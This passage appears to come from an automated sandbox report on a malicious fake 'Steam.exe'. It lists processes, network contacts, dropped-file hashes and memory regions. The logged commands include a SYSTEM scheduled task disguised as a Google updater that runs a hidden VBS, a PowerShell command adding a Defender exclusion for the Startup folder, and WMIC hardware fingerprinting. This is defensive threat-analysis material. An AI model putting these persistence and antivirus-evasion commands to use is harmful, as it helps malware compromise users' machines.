"C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
C:\Users\Admin\AppData\Local\Temp\Steam.exe
"C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --mojo-platform-channel-handle=1288 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
C:\Windows\system32\cscript.exe
cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs"
C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
C:\Windows\system32\find.exe
find /i "Speed"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat" "
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell wininit.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
C:\Windows\system32\wininit.exe
"C:\Windows\system32\wininit.exe"
Network
| Country | Destination | Domain | Proto |
| N/A | 127.0.0.1:49758 | tcp | |
| US | 8.8.8.8:53 | api.ipify.org | udp |
| US | 104.26.13.205:80 | api.ipify.org | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\f1488582-d6b7-497c-9bf5-c48c7a80f6cf.tmp.node
| MD5 | 3072b68e3c226aff39e6782d025f25a8 |
| SHA1 | cf559196d74fa490ac8ce192db222c9f5c5a006a |
| SHA256 | 7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01 |
| SHA512 | 61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vzfzesfy.ged.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2488-14-0x00000251CA150000-0x00000251CA172000-memory.dmp
memory/2488-15-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
memory/2488-16-0x00000251B1BC0000-0x00000251B1BD0000-memory.dmp
memory/2488-17-0x00000251B1BC0000-0x00000251B1BD0000-memory.dmp
memory/2488-18-0x00000251CA210000-0x00000251CA260000-memory.dmp
memory/2488-22-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | f10a836b72e0bf0946a8e1cd5fadce2c |
| SHA1 | 586b63a56f0eb3e84be0cca2aa83a3ad66ad268e |
| SHA256 | 5e314ed17c2e2997a8ffde8d3d68a05004fb29659ad1a10e698f04462a9d69d5 |
| SHA512 | 1ecfe04091c336147e372ea24defeeb0c965ad2a02f64e4c6f64edf25a1cf289b02456c782fd3a9a6f401f947fd07125c36c9bbcb5eff4ac11d2b99b5c3827fd |
memory/4852-33-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
memory/4852-35-0x000001F1912C0000-0x000001F1912D0000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7a2b288b6516ace3c60a8b6718511f0a |
| SHA1 | 7783140c099db9de2dcc5d5fc4ac79105e41f707 |
| SHA256 | 921c27cf4a64523fdcaa3f724a90a5f635da1f05541b7c6bcce9b5a892909ce9 |
| SHA512 | 56d57c9c46be4fef39b6d1a0cc5b769eec05f42a08323b41c222096831be315009860d4bd3d7dc5833887845d11806cf2eef24ce7e24888c2c30777f6918974f |
memory/4852-37-0x000001F1912C0000-0x000001F1912D0000-memory.dmp
memory/4852-36-0x000001F1912C0000-0x000001F1912D0000-memory.dmp
memory/4852-40-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs
| MD5 | 849a5123f73771f6fe0e36056813e7cb |
| SHA1 | ccf4436fccf38a27cabf2603e61557976dbe3b01 |
| SHA256 | e0388ef99c9337d7779c5cbca39cc51d558ca6aa2434f8d7e0794ae1cdb7c870 |
| SHA512 | 1204530de2c24b8ce159ec95044b9cb065a8aab95143b73467ea67fc3756c08f9b782dc9934ab98cfdb27f33caa6f7157b7750763f78e5406c46533ec37f9ebd |
C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat
| MD5 | 79a5e87823b83ea148f718b5fe237ec9 |
| SHA1 | 408431f7d062aef5017f2ce715b2da16a8585fa8 |
| SHA256 | 0626a1ecba78a0d83bddf6fceb66ba490e5ba176516e496faec4c1b3e344e2a1 |
| SHA512 | 2433d01f189a49a3155f46d494bc2a441faf0f29160d5709e92972d558afa22ac6bd71e089fbd7a19a39ca151f90b086d5cbb6e7f17f7460df35397cf73cf5a8 |
memory/4796-71-0x00007FFEFB190000-0x00007FFEFBC52000-memory.dmp
memory/4796-72-0x000001DC0CC40000-0x000001DC0CC50000-memory.dmp
memory/1412-74-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp
memory/1412-73-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp
memory/4796-80-0x000001DC0CC40000-0x000001DC0CC50000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 14bb94c36d909375f4a2c1163c1780fb |
| SHA1 | 02ff6e3a0293fe7428499390adacc96862e17d91 |
| SHA256 | e291bdfc4667f621131172b199039aa4147404efa429ad54482073b4e46c391a |
| SHA512 | 9241b39e96e443a40e9cb59b5db5f8e5724203742ecdad77f147bb59360fdf7d198ad49c44682d707fe3ab77b5cd01b1d9c27cfc8e3900ea2a99fad9a26cb0b6 |
memory/1412-93-0x00007FFEFB190000-0x00007FFEFBC52000-memory.dmp
memory/1412-94-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp
Analysis: behavioral11
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
88s
Max time network
100s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 52.111.229.48:443 | tcp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-04-07 19:44
Reported
2024-04-07 19:48
Platform
win11-20240221-en
Max time kernel
90s
Max time network
100s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vulkan-1.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |